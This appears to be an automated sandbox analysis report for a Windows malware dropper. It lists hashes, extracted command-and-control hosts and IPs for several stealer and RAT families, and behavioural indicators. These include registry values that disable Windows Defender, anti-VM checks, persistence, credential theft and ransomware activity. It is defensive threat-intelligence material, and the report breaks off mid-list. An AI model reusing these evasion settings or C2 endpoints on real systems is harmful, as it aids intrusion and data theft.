Resubmissions
04-12-2024 19:44
241204-yftswatlcj 1028-11-2024 19:40
241128-ydqnfaxqgy 1020-11-2024 16:31
241120-t1tw6azjfy 1020-11-2024 06:05
241120-gtdv5ssnes 1020-11-2024 06:00
241120-gqchxascje 1020-11-2024 05:52
241120-gk2kvaxkgn 1018-11-2024 21:54
241118-1sd93a1lfr 1017-11-2024 11:03
241117-m55qwsyemr 316-11-2024 19:06
241116-xsbmdssbkd 1016-11-2024 18:38
241116-w913ya1jcy 10Analysis
-
max time kernel
934s -
max time network
950s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
20-11-2024 06:05
Static task
static1
Behavioral task
behavioral1
Sample
4363463463464363463463463.exe
Resource
win10v2004-20241007-en
Behavioral task
behavioral2
Sample
4363463463464363463463463.exe
Resource
win10ltsc2021-20241023-en
Behavioral task
behavioral3
Sample
4363463463464363463463463.exe
Resource
win11-20241007-en
Errors
General
-
Target
4363463463464363463463463.exe
-
Size
10KB
-
MD5
2a94f3960c58c6e70826495f76d00b85
-
SHA1
e2a1a5641295f5ebf01a37ac1c170ac0814bb71a
-
SHA256
2fcad226b17131da4274e1b9f8f31359bdd325c9568665f08fd1f6c5d06a23ce
-
SHA512
fbf55b55fcfb12eb8c029562956229208b9e8e2591859d6336c28a590c92a4d0f7033a77c46ef6ebe07ddfca353aba1e84b51907cd774beab148ee901c92d62f
-
SSDEEP
192:xlwayyHOXGc20L7BIW12n/ePSjiTlzkGu8stYcFwVc03KY:xlwwHe/20PKn/cLTlHuptYcFwVc03K
Malware Config
Extracted
cryptbot
thizx13vt.top
analforeverlovyu.top
-
url_path
/v1/upload.php
Extracted
risepro
3.36.173.8:50500
Extracted
xworm
sound-vietnam.gl.at.ply.gg:52575
-
Install_directory
%LocalAppData%
-
install_file
Terraria-Multiplayer-Fix-Online.exe
Extracted
redline
TG CLOUD @RLREBORN Admin @FATHEROFCARDERS
89.105.223.196:29862
Extracted
quasar
1.4.1
Office04
91.92.254.40:4782
56928f7b-c5c9-4b24-af59-8c509ce1d27e
-
encryption_key
60574F1741A0786C827AF49C652AB3A7DA0533D1
-
install_name
Client.exe
-
log_directory
Logs
-
reconnect_delay
3000
-
startup_key
Windows System
-
subdirectory
SubDir
Signatures
-
Asyncrat family
-
Cryptbot family
-
Detect Neshta payload 1 IoCs
resource yara_rule behavioral1/files/0x0007000000023ee0-38210.dat family_neshta -
Detect Xworm Payload 3 IoCs
resource yara_rule behavioral1/files/0x000d000000023cee-601.dat family_xworm behavioral1/memory/4764-608-0x00000000009E0000-0x00000000009F8000-memory.dmp family_xworm behavioral1/files/0x0007000000023ede-38168.dat family_xworm -
Dharma
Dharma is a ransomware that uses security software installation to hide malicious activities.
-
Dharma family
-
Lockbit
Ransomware family with multiple variants released since late 2019.
-
Lockbit family
-
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection def.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" def.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" def.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" def.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" def.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" def.exe -
Modifies security service 2 TTPs 3 IoCs
description ioc Process Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Start = "4" sysvplervcs.exe Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Start = "4" sysklnorbcv.exe Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Start = "4" sysvplervcs.exe -
Neshta
Malware from the neshta family is designed to infect itself into other files to spread itself and cause damage.
-
Neshta family
-
Phorphiex family
-
Phorphiex payload 3 IoCs
resource yara_rule behavioral1/files/0x0007000000023cc8-278.dat family_phorphiex behavioral1/files/0x0002000000021ee0-549.dat family_phorphiex behavioral1/files/0x000a000000023e35-32123.dat family_phorphiex -
description flow ioc Process 1772 ip-api.com Process not Found Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 4363463463464363463463463.exe 305 ipinfo.io Process not Found 306 ipinfo.io Process not Found 1221 ip-api.com Process not Found 2574 ip-api.com Process not Found 138 ip-api.com Process not Found 602 ipinfo.io Process not Found 604 ipinfo.io Process not Found -
Quasar family
-
Quasar payload 5 IoCs
resource yara_rule behavioral1/files/0x0009000000023e0e-31920.dat family_quasar behavioral1/memory/29384-31941-0x0000000000540000-0x0000000000864000-memory.dmp family_quasar behavioral1/files/0x0007000000023e7e-35206.dat family_quasar behavioral1/files/0x0007000000023edf-38189.dat family_quasar behavioral1/files/0x0009000000023f41-43778.dat family_quasar -
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine payload 1 IoCs
resource yara_rule behavioral1/memory/29232-31915-0x0000000000400000-0x0000000000452000-memory.dmp family_redline -
Redline family
-
Risepro family
-
Rule to detect Lockbit 3.0 ransomware Windows payload 1 IoCs
resource yara_rule behavioral1/files/0x0007000000023ee1-38229.dat family_lockbit -
Suspicious use of NtCreateProcessExOtherParentProcess 3 IoCs
description pid Process procid_target PID 30980 created 29388 30980 WerFault.exe 916 PID 31220 created 38384 31220 WerFault.exe 601 PID 32972 created 28224 32972 WerFault.exe 396 -
Suspicious use of NtCreateUserProcessOtherParentProcess 38 IoCs
description pid Process procid_target PID 2548 created 3556 2548 winn.exe 56 PID 2548 created 3556 2548 winn.exe 56 PID 2548 created 3556 2548 winn.exe 56 PID 2548 created 3556 2548 winn.exe 56 PID 2548 created 3556 2548 winn.exe 56 PID 2548 created 3556 2548 winn.exe 56 PID 2548 created 3556 2548 winn.exe 56 PID 2548 created 3556 2548 winn.exe 56 PID 40216 created 3556 40216 2605629901.exe 56 PID 40216 created 3556 40216 2605629901.exe 56 PID 9100 created 3556 9100 winupsecvmgr.exe 56 PID 9100 created 3556 9100 winupsecvmgr.exe 56 PID 9100 created 3556 9100 winupsecvmgr.exe 56 PID 19236 created 3556 19236 conhost.exe 56 PID 19236 created 3556 19236 conhost.exe 56 PID 17284 created 3556 17284 winupsecvmgr.exe 56 PID 17284 created 3556 17284 winupsecvmgr.exe 56 PID 19236 created 3556 19236 conhost.exe 56 PID 19236 created 3556 19236 conhost.exe 56 PID 15524 created 3556 15524 winupsecvmgr.exe 56 PID 15524 created 3556 15524 winupsecvmgr.exe 56 PID 19236 created 3556 19236 conhost.exe 56 PID 19236 created 3556 19236 conhost.exe 56 PID 11020 created 3556 11020 winupsecvmgr.exe 56 PID 11020 created 3556 11020 winupsecvmgr.exe 56 PID 19236 created 3556 19236 conhost.exe 56 PID 19236 created 3556 19236 conhost.exe 56 PID 3896 created 3556 3896 winupsecvmgr.exe 56 PID 3896 created 3556 3896 winupsecvmgr.exe 56 PID 19236 created 3556 19236 conhost.exe 56 PID 19236 created 3556 19236 conhost.exe 56 PID 29040 created 3556 29040 winupsecvmgr.exe 56 PID 29040 created 3556 29040 winupsecvmgr.exe 56 PID 41088 created 616 41088 powershell.EXE 5 PID 9504 created 18312 9504 svchost.exe 685 PID 30520 created 29388 30520 svchost.exe 916 PID 30520 created 38384 30520 svchost.exe 601 PID 30520 created 28224 30520 svchost.exe 396 -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\UpdatesOverride = "1" sysvplervcs.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\UpdatesDisableNotify = "1" sysvplervcs.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\FirewallOverride = "1" sysklnorbcv.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\UpdatesOverride = "1" sysklnorbcv.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\FirewallDisableNotify = "1" sysvplervcs.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiVirusOverride = "1" sysvplervcs.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiVirusDisableNotify = "1" sysvplervcs.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\FirewallDisableNotify = "1" sysklnorbcv.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiVirusDisableNotify = "1" sysklnorbcv.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\UpdatesOverride = "1" sysvplervcs.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\FirewallOverride = "1" sysvplervcs.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiVirusOverride = "1" sysklnorbcv.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\UpdatesDisableNotify = "1" sysklnorbcv.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\FirewallOverride = "1" sysvplervcs.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\FirewallDisableNotify = "1" sysvplervcs.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\UpdatesDisableNotify = "1" sysvplervcs.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiVirusOverride = "1" sysvplervcs.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiVirusDisableNotify = "1" sysvplervcs.exe -
XMRig Miner payload 2 IoCs
resource yara_rule behavioral1/files/0x000400000001ead7-28624.dat family_xmrig behavioral1/files/0x000400000001ead7-28624.dat xmrig -
Xmrig family
-
Xworm family
-
Async RAT payload 3 IoCs
resource yara_rule behavioral1/files/0x0007000000023f39-42608.dat family_asyncrat behavioral1/files/0x0008000000023f44-43817.dat family_asyncrat behavioral1/files/0x0009000000023f4c-44899.dat family_asyncrat -
Deletes shadow copies 3 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 8 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ random.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ axplong.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 8facf62118.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ axplong.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ fd45ee69c3.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 1b2e8379f6.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ def.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ rorukal.exe -
Looks for VirtualBox Guest Additions in registry 2 TTPs 1 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\SOFTWARE\Oracle\VirtualBox Guest Additions rorukal.exe -
Renames multiple (517) files with added filename extension
This suggests ransomware activity of encrypting all the files on the system.
-
Blocklisted process makes network request 4 IoCs
flow pid Process 93 700 powershell.exe 125 700 powershell.exe 146 700 powershell.exe 190 700 powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 44 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
pid Process 29312 powershell.exe 31288 powershell.exe 40208 powershell.exe 39036 Process not Found 3468 powershell.exe 35584 powershell.exe 3240 powershell.exe 38116 powershell.exe 11568 powershell.exe 28536 powershell.exe 31124 powershell.exe 34512 powershell.exe 13928 powershell.exe 3512 powershell.exe 39032 powershell.exe 30296 powershell.exe 34924 powershell.exe 14212 powershell.exe 13364 powershell.exe 34536 powershell.exe 3788 powershell.exe 2904 powershell.exe 4984 powershell.exe 2376 powershell.exe 4120 powershell.exe 33680 powershell.exe 40684 powershell.exe 11612 powershell.exe 9472 powershell.exe 16084 powershell.exe 41088 powershell.EXE 39372 Process not Found 11128 powershell.exe 8792 powershell.exe 11276 powershell.exe 2616 powershell.exe 9476 powershell.exe 18656 powershell.exe 18092 powershell.exe 17816 powershell.exe 17200 powershell.exe 14596 powershell.exe 12936 powershell.exe 40624 Process not Found -
Contacts a large (612) amount of remote hosts 1 TTPs
This may indicate a network scan to discover remotely running services.
-
Creates new service(s) 2 TTPs
-
Downloads MZ/PE file
-
Looks for VMWare Tools registry key 2 TTPs 1 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\SOFTWARE\VMware, Inc.\VMware Tools rorukal.exe -
Server Software Component: Terminal Services DLL 1 TTPs 2 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\x123821\Parameters\ServiceDll = "C:\\Windows\\System32\\x123821.dat" reg.exe Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\x738946\Parameters\ServiceDll = "C:\\Windows\\System32\\x738946.dat" reg.exe -
Sets service image path in registry 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Mesh Agent\ImagePath = "\"C:\\Program Files (x86)\\Mesh Agent\\MeshAgent.exe\" " meshagent32-group.exe -
Checks BIOS information in registry 2 TTPs 14 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion axplong.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 1b2e8379f6.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 8facf62118.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion def.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion random.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion random.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion fd45ee69c3.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion axplong.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion axplong.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion axplong.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 1b2e8379f6.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion def.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 8facf62118.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion fd45ee69c3.exe -
Checks computer location settings 2 TTPs 24 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\Control Panel\International\Geo\Nation wmisecure64.exe Key value queried \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\Control Panel\International\Geo\Nation axplong.exe Key value queried \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\Control Panel\International\Geo\Nation dxwebsetup.exe Key value queried \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\Control Panel\International\Geo\Nation 4363463463464363463463463.exe Key value queried \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\Control Panel\International\Geo\Nation 1279416929.exe Key value queried \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\Control Panel\International\Geo\Nation sysvplervcs.exe Key value queried \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\Control Panel\International\Geo\Nation 937727480.exe Key value queried \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\Control Panel\International\Geo\Nation CoronaVirus.exe Key value queried \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\Control Panel\International\Geo\Nation build.exe Key value queried \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\Control Panel\International\Geo\Nation actives.exe Key value queried \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\Control Panel\International\Geo\Nation sysvplervcs.exe Key value queried \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\Control Panel\International\Geo\Nation sysklnorbcv.exe Key value queried \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\Control Panel\International\Geo\Nation exclude.exe Key value queried \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\Control Panel\International\Geo\Nation svhostc.exe Key value queried \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\Control Panel\International\Geo\Nation AllNew.exe Key value queried \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\Control Panel\International\Geo\Nation random.exe Key value queried \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\Control Panel\International\Geo\Nation Gxtuum.exe Key value queried \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\Control Panel\International\Geo\Nation XClient.exe Key value queried \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\Control Panel\International\Geo\Nation 301428338.exe Key value queried \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\Control Panel\International\Geo\Nation GlitchClipper.exe Key value queried \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\Control Panel\International\Geo\Nation 228833585.exe Key value queried \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\Control Panel\International\Geo\Nation fuag.exe Key value queried \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\Control Panel\International\Geo\Nation OfferedBuilt.exe Key value queried \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\Control Panel\International\Geo\Nation Final.exe -
Credentials from Password Stores: Windows Credential Manager 1 TTPs
Suspicious access to Credentials History.
-
Drops startup file 8 IoCs
description ioc Process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\desktop.ini.id-FA31BADC.[[email protected]].ncov CoronaVirus.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\desktop.ini.id-FA31BADC.[[email protected]].ncov CoronaVirus.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Terraria-Multiplayer-Fix-Online.lnk CoronaVirus.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Info.hta CoronaVirus.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Terraria-Multiplayer-Fix-Online.lnk XClient.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Terraria-Multiplayer-Fix-Online.lnk XClient.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\CoronaVirus.exe CoronaVirus.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\desktop.ini CoronaVirus.exe -
Executes dropped EXE 64 IoCs
pid Process 4880 OfferedBuilt.exe 2808 3546345.exe 1752 1.exe 1012 Mph.pif 1404 sysklnorbcv.exe 1972 Mph.pif 3792 exclude.exe 1760 legas.exe 4276 xSzEYbwSa1.exe 1380 87Zvwj4Zse.exe 1188 def.exe 4468 CoronaVirus.exe 1668 a.exe 1008 t1.exe 744 xworm.exe 2468 whiteheroin.exe 3728 sysvplervcs.exe 4764 XClient.exe 652 937727480.exe 3004 Organiser.exe 2548 winn.exe 2072 Final.exe 1680 2673718949.exe 2476 build.exe 38760 2774828533.exe 43908 pyld64.exe 7588 Operation6572.exe 10336 Terraria-Multiplayer-Fix-Online.exe 39800 1049131053.exe 40164 usvcinsta64.exe 40216 2605629901.exe 40276 pered.exe 40812 pered.exe 11956 rorukal.exe 11724 client.exe 9760 printui.exe 9100 winupsecvmgr.exe 7908 console_zero.exe 17992 r2.exe 17284 winupsecvmgr.exe 16940 Terraria-Multiplayer-Fix-Online.exe 12504 xmrig.exe 15524 winupsecvmgr.exe 12112 1279416929.exe 11020 winupsecvmgr.exe 10908 301548398.exe 512 935133350.exe 9252 config.exe 24320 1044224715.exe 24376 Terraria-Multiplayer-Fix-Online.exe 3896 winupsecvmgr.exe 8552 actives.exe 8020 actives.exe 24004 MK.exe 5784 Photos.exe 4732 wmiintegrator.exe 24224 wmihostwin.exe 24288 XM.exe 24436 wmimic.exe 24500 wmisecure.exe 3100 wmisecure64.exe 28224 S%D0%B5tu%D1%80111.exe 28416 x590972.exe 28984 x715467.dat -
Identifies Wine through registry keys 2 TTPs 7 IoCs
Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\Software\Wine fd45ee69c3.exe Key opened \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\Software\Wine 1b2e8379f6.exe Key opened \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\Software\Wine def.exe Key opened \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\Software\Wine random.exe Key opened \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\Software\Wine axplong.exe Key opened \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\Software\Wine 8facf62118.exe Key opened \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\Software\Wine axplong.exe -
Indicator Removal: Clear Windows Event Logs 1 TTPs 1 IoCs
Clear Windows Event Logs to hide the activity of an intrusion.
description ioc Process File opened for modification C:\Windows\System32\Winevt\Logs\Microsoft-Windows-RestartManager%4Operational.evtx svchost.exe -
Loads dropped DLL 64 IoCs
pid Process 2468 whiteheroin.exe 40812 pered.exe 40812 pered.exe 40812 pered.exe 40812 pered.exe 40812 pered.exe 40812 pered.exe 40812 pered.exe 40812 pered.exe 40812 pered.exe 40812 pered.exe 40812 pered.exe 40812 pered.exe 40812 pered.exe 40812 pered.exe 40812 pered.exe 40812 pered.exe 40812 pered.exe 40812 pered.exe 40812 pered.exe 9760 printui.exe 8196 svchost.exe 8196 svchost.exe 8196 svchost.exe 8196 svchost.exe 8196 svchost.exe 8196 svchost.exe 8196 svchost.exe 8196 svchost.exe 8196 svchost.exe 8196 svchost.exe 7908 console_zero.exe 7908 console_zero.exe 17992 r2.exe 17992 r2.exe 17992 r2.exe 17992 r2.exe 17992 r2.exe 17992 r2.exe 17992 r2.exe 31220 printui.exe 31692 svchost.exe 31692 svchost.exe 31692 svchost.exe 31692 svchost.exe 31692 svchost.exe 31692 svchost.exe 31692 svchost.exe 31692 svchost.exe 31692 svchost.exe 31748 console_zero.exe 31748 console_zero.exe 38768 Armanivenntii_crypted_EASY.exe 38972 inst77player_1.0.0.1.exe 31276 ha7dur10.exe 33500 Javvvum.exe 36168 stail.tmp 36168 stail.tmp 36168 stail.tmp 36380 views.exe 3864 Newfts.exe 3864 Newfts.exe 3864 Newfts.exe 3864 Newfts.exe -
Modifies system executable filetype association 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shell\open\command\ = "C:\\Windows\\svchost.com \"%1\" %*" dxwebsetup.exe -
Reads data files stored by FTP clients 2 TTPs
Tries to access configuration files associated with programs like FileZilla.
-
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Unexpected DNS network traffic destination 1 IoCs
Network traffic to other servers than the configured DNS servers was detected on the DNS port.
description ioc Destination IP 141.98.234.31 -
Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
-
resource yara_rule behavioral1/files/0x0008000000023e7c-35321.dat vmprotect -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\FirewallDisableNotify = "1" sysvplervcs.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiVirusOverride = "1" sysvplervcs.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\UpdatesOverride = "1" sysvplervcs.exe Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features def.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\FirewallOverride = "1" sysvplervcs.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\UpdatesDisableNotify = "1" sysvplervcs.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\FirewallOverride = "1" sysvplervcs.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\UpdatesDisableNotify = "1" sysklnorbcv.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiSpywareOverride = "1" sysvplervcs.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiVirusOverride = "1" sysvplervcs.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiVirusDisableNotify = "1" sysvplervcs.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\FirewallOverride = "1" sysklnorbcv.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiSpywareOverride = "1" sysklnorbcv.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiVirusOverride = "1" sysklnorbcv.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\UpdatesOverride = "1" sysklnorbcv.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\UpdatesDisableNotify = "1" sysvplervcs.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\FirewallDisableNotify = "1" sysklnorbcv.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\FirewallDisableNotify = "1" sysvplervcs.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\UpdatesOverride = "1" sysvplervcs.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiVirusDisableNotify = "1" sysklnorbcv.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" def.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiVirusDisableNotify = "1" sysvplervcs.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiSpywareOverride = "1" sysvplervcs.exe -
Accesses Microsoft Outlook profiles 1 TTPs 9 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\Software\Microsoft\Office\18.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 build.exe Key opened \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\Software\Microsoft\Office\20.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 build.exe Key opened \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 build.exe Key opened \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\Software\Microsoft\Office\17.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 build.exe Key opened \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\Software\Microsoft\Office\14.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 build.exe Key opened \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 build.exe Key opened \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\Software\Microsoft\Office\19.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 build.exe Key opened \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging 